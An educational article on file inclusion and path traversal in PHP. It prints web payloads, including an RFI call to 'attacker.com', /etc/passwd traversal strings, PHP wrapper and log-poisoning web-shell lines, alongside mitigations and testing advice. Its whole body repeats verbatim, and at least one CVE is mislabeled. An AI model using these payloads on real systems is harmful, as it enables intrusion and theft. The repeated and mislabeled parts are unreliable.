Understanding File Inclusion and Path Traversal

File inclusion and path traversal vulnerabilities exploit weak input validation in web applications, allowing attackers to access unauthorized files or execute malicious code. These flaws occur when an application dynamically includes files or constructs file paths using unsanitized user input, enabling directory traversal or remote file execution.

Key Points

File Inclusion Vulnerabilities: Occur when an application incorporates files based on user-controlled input.
Path Traversal Vulnerabilities: Involve manipulating file paths to access files outside the intended directory.
Critical Risks: Both vulnerabilities can lead to remote code execution (RCE), data breaches, or complete system compromise if left unaddressed.

Key Concepts

File Inclusion Vulnerabilities

File inclusion vulnerabilities arise when an application incorporates files based on user-controlled input. Attackers exploit these flaws to:

Include local files (Local File Inclusion, LFI) to read sensitive data
Include remote files (Remote File Inclusion, RFI) to execute arbitrary code
Bypass security controls by manipulating file paths

Path Traversal Vulnerabilities

Path traversal (or directory traversal) occurs when an attacker manipulates file paths to access files outside the intended directory. Common techniques include:

Using ../ sequences to navigate up directory structures
Employing URL encoding (%2e%2e%2f) to bypass filters
Exploiting weak path normalization

Attack Vectors and Techniques

1. Remote File Inclusion (RFI)

RFI allows attackers to include files from external sources, typically via manipulated input parameters.

Example Attack:

include($_GET['page']);  // Vulnerable code

Attackers exploit this with:

http://vulnerable-site.com/include.php?page=http://attacker.com/malicious.php

2. Local File Inclusion (LFI)

LFI enables attackers to access files on the server by traversing directories.

Common Targets:

/etc/passwd (Linux user credentials)
/etc/shadow (Password hashes)
Web server configuration files
Application source code

Example Attack:

http://vulnerable-site.com/include.php?page=../../../../etc/passwd

3. PHP Wrappers Exploitation

PHP wrappers provide access to various data streams and can be weaponized:

Wrapper	Purpose	Example Exploit
`php://filter`	File content manipulation	`php://filter/convert.base64-encode/resource=/etc/passwd`
`data://`	Direct code execution	`data:text/plain,<?php system($_GET['cmd']); ?>`
`expect://`	Command execution	`expect://id`

Advanced Exploit Example:

// Base64-encoded payload that executes system commands
php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+

4. Base Directory Breakout Techniques

Attackers use obfuscation to bypass security filters:

Technique	Example	Bypass Method
Standard Encoding	`%2e%2e%2f`	URL-encoded `../`
Double Encoding	`%252e%252e%252f`	Double URL encoding
Null Byte Injection	`../../file.php%00`	Truncates path (PHP < 5.3.4)
Path Truncation	`../../../../etc/passwd/./././`	Exceeds max path length

5. Log Poisoning

Attackers inject malicious code into log files, then include these logs via LFI:

Step 1: Inject PHP code into a log file (e.g., via User-Agent header)
```
GET / HTTP/1.1
User-Agent: <?php system($_GET['cmd']); ?>
```

Step 2: Include the poisoned log file

http://vulnerable-site.com/include.php?page=/var/log/apache2/access.log&cmd=id

6. PHP Session Files Exploitation

Attackers manipulate session data to achieve RCE:

Step 1: Inject PHP code into a session variable

$_SESSION['username'] = '<?php system($_GET["cmd"]); ?>';

Step 2: Include the session file

http://vulnerable-site.com/include.php?page=/var/lib/php/sessions/sess_abc123&cmd=id

Mitigation Strategies

Input Validation and Sanitization

Reject dangerous patterns: Block sequences like ../, ://, or null bytes
Use allowlists: Only permit specific, known-safe file paths
Normalize paths: Resolve ../ sequences before processing

Secure Coding Practices

Avoid dynamic file inclusion: Use static file paths where possible
Disable dangerous functions: Set allow_url_include = Off in php.ini
Implement proper error handling: Don't expose sensitive paths in errors

Server Configuration

Restrict file system access: Use open_basedir to limit PHP's file access
Disable PHP execution in upload directories: Set .htaccess rules
Keep software updated: Patch known vulnerabilities promptly

Defense-in-Depth Measures

Web Application Firewall (WAF): Deploy rules to detect traversal attempts
Least privilege principle: Run web servers with minimal permissions
Regular audits: Conduct penetration testing and code reviews

Pro Tip: Combine multiple layers of defense—no single control provides complete protection.

Real-World Impact

Notable Exploits

WordPress TimThumb Vulnerability (2011)
- Exploited RFI to upload malicious files
- Affected millions of websites
PHP-CGI Remote Code Execution (2012)
- Combined path traversal with PHP wrapper exploitation
- CVE-2012-1823: Critical vulnerability with widespread impact
Joomla! LFI Vulnerability (2015)
- Allowed attackers to read configuration files
- CVE-2015-8562: Used in mass exploitation campaigns

Attack Chains

Attackers often combine these vulnerabilities:

LFI → RCE via Log Poisoning
RFI → Web Shell Upload
Path Traversal → Credential Theft → Privilege Escalation

Detection and Testing

Manual Testing Techniques

Basic Traversal Test:

http://example.com/page.php?file=../../../../etc/passwd

PHP Wrapper Test:

http://example.com/page.php?file=php://filter/convert.base64-encode/resource=index.php

Null Byte Test (for older PHP versions):

http://example.com/page.php?file=../../../../etc/passwd%00

Automated Tools

Burp Suite: Scanner and manual testing capabilities
OWASP ZAP: Free security scanner
Nmap: Scripts like http-passwd for detection
Metasploit: Modules for exploitation (e.g., exploit/unix/webapp/php_include)

Code Review Checklist

Are file inclusion functions (include, require, file_get_contents) using user input?
Is there proper path sanitization before file operations?
Are dangerous PHP functions disabled (allow_url_include, register_globals)?
Are file paths being constructed securely?

Learn More

Recommended Resources

OWASP Testing Guide: File Inclusion Testing
PHP Security Cheat Sheet: File Inclusion Prevention
PortSwigger Academy: Path Traversal Labs
CWE Database:
- CWE-98: Improper Control of Filename for Include/Require Statement
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory

Hands-On Practice

Vulnerable Applications:
- DVWA (Damn Vulnerable Web App)
- OWASP Juice Shop
- Metasploitable 2
Capture The Flag (CTF) Challenges:
- Hack The Box
- OverTheWire
- Root Me

Advanced Topics

Race Condition Exploits: Time-of-check to time-of-use (TOCTOU) vulnerabilities
Zip Slip Vulnerability: Exploiting archive extraction flaws
XXE to LFI: Combining XML External Entity attacks with file inclusion
Deserialization Attacks: PHP object injection leading to file inclusion

Key Points

File Inclusion Vulnerabilities: Occur when an application incorporates files based on user-controlled input.
Path Traversal Vulnerabilities: Involve manipulating file paths to access files outside the intended directory.
Critical Risks: Both vulnerabilities can lead to remote code execution (RCE), data breaches, or complete system compromise if left unaddressed.

Key Concepts

File Inclusion Vulnerabilities

File inclusion vulnerabilities arise when an application incorporates files based on user-controlled input. Attackers exploit these flaws to:

Include local files (Local File Inclusion, LFI) to read sensitive data
Include remote files (Remote File Inclusion, RFI) to execute arbitrary code
Bypass security controls by manipulating file paths

Path Traversal Vulnerabilities

Path traversal (or directory traversal) occurs when an attacker manipulates file paths to access files outside the intended directory. Common techniques include:

Using ../ sequences to navigate up directory structures
Employing URL encoding (%2e%2e%2f) to bypass filters
Exploiting weak path normalization

Attack Vectors and Techniques

1. Remote File Inclusion (RFI)

RFI allows attackers to include files from external sources, typically via manipulated input parameters.

Example Attack:

include($_GET['page']);  // Vulnerable code

Attackers exploit this with:

http://vulnerable-site.com/include.php?page=http://attacker.com/malicious.php

2. Local File Inclusion (LFI)

LFI enables attackers to access files on the server by traversing directories.

Common Targets:

/etc/passwd (Linux user credentials)
/etc/shadow (Password hashes)
Web server configuration files
Application source code

Example Attack:

http://vulnerable-site.com/include.php?page=../../../../etc/passwd

3. PHP Wrappers Exploitation

PHP wrappers provide access to various data streams and can be weaponized:

Wrapper	Purpose	Example Exploit
`php://filter`	File content manipulation	`php://filter/convert.base64-encode/resource=/etc/passwd`
`data://`	Direct code execution	`data:text/plain,<?php system($_GET['cmd']); ?>`
`expect://`	Command execution	`expect://id`

Advanced Exploit Example:

// Base64-encoded payload that executes system commands
php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+

4. Base Directory Breakout Techniques

Attackers use obfuscation to bypass security filters:

Technique	Example	Bypass Method
Standard Encoding	`%2e%2e%2f`	URL-encoded `../`
Double Encoding	`%252e%252e%252f`	Double URL encoding
Null Byte Injection	`../../file.php%00`	Truncates path (PHP < 5.3.4)
Path Truncation	`../../../../etc/passwd/./././`	Exceeds max path length

5. Log Poisoning

Attackers inject malicious code into log files, then include these logs via LFI:

Step 1: Inject PHP code into a log file (e.g., via User-Agent header)
```
GET / HTTP/1.1
User-Agent: <?php system($_GET['cmd']); ?>
```

Step 2: Include the poisoned log file

http://vulnerable-site.com/include.php?page=/var/log/apache2/access.log&cmd=id

6. PHP Session Files Exploitation

Attackers manipulate session data to achieve RCE:

Step 1: Inject PHP code into a session variable

$_SESSION['username'] = '<?php system($_GET["cmd"]); ?>';

Step 2: Include the session file

http://vulnerable-site.com/include.php?page=/var/lib/php/sessions/sess_abc123&cmd=id

Mitigation Strategies

Input Validation and Sanitization

Reject dangerous patterns: Block sequences like ../, ://, or null bytes
Use allowlists: Only permit specific, known-safe file paths
Normalize paths: Resolve ../ sequences before processing

Secure Coding Practices

Avoid dynamic file inclusion: Use static file paths where possible
Disable dangerous functions: Set allow_url_include = Off in php.ini
Implement proper error handling: Don't expose sensitive paths in errors

Server Configuration

Restrict file system access: Use open_basedir to limit PHP's file access
Disable PHP execution in upload directories: Set .htaccess rules
Keep software updated: Patch known vulnerabilities promptly

Defense-in-Depth Measures

Web Application Firewall (WAF): Deploy rules to detect traversal attempts
Least privilege principle: Run web servers with minimal permissions
Regular audits: Conduct penetration testing and code reviews

Pro Tip: Combine multiple layers of defense—no single control provides complete protection.

Real-World Impact

Notable Exploits

WordPress TimThumb Vulnerability (2011)
- Exploited RFI to upload malicious files
- Affected millions of websites
PHP-CGI Remote Code Execution (2012)
- Combined path traversal with PHP wrapper exploitation
- CVE-2012-1823: Critical vulnerability with widespread impact
Joomla! LFI Vulnerability (2015)
- Allowed attackers to read configuration files
- CVE-2015-8562: Used in mass exploitation campaigns

Attack Chains

Attackers often combine these vulnerabilities:

LFI → RCE via Log Poisoning
RFI → Web Shell Upload
Path Traversal → Credential Theft → Privilege Escalation

Detection and Testing

Manual Testing Techniques

Basic Traversal Test:

http://example.com/page.php?file=../../../../etc/passwd

PHP Wrapper Test:

http://example.com/page.php?file=php://filter/convert.base64-encode/resource=index.php

Null Byte Test (for older PHP versions):

http://example.com/page.php?file=../../../../etc/passwd%00

Automated Tools

Burp Suite: Scanner and manual testing capabilities
OWASP ZAP: Free security scanner
Nmap: Scripts like http-passwd for detection
Metasploit: Modules for exploitation (e.g., exploit/unix/webapp/php_include)

Code Review Checklist

Are file inclusion functions (include, require, file_get_contents) using user input?
Is there proper path sanitization before file operations?
Are dangerous PHP functions disabled (allow_url_include, register_globals)?
Are file paths being constructed securely?

Learn More

Recommended Resources

OWASP Testing Guide: File Inclusion Testing
PHP Security Cheat Sheet: File Inclusion Prevention
PortSwigger Academy: Path Traversal Labs
CWE Database:
- CWE-98: Improper Control of Filename for Include/Require Statement
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory

Hands-On Practice

Vulnerable Applications:
- DVWA (Damn Vulnerable Web App)
- OWASP Juice Shop
- Metasploitable 2
Capture The Flag (CTF) Challenges:
- Hack The Box
- OverTheWire
- Root Me

Advanced Topics

Race Condition Exploits: Time-of-check to time-of-use (TOCTOU) vulnerabilities
Zip Slip Vulnerability: Exploiting archive extraction flaws
XXE to LFI: Combining XML External Entity attacks with file inclusion
Deserialization Attacks: PHP object injection leading to file inclusion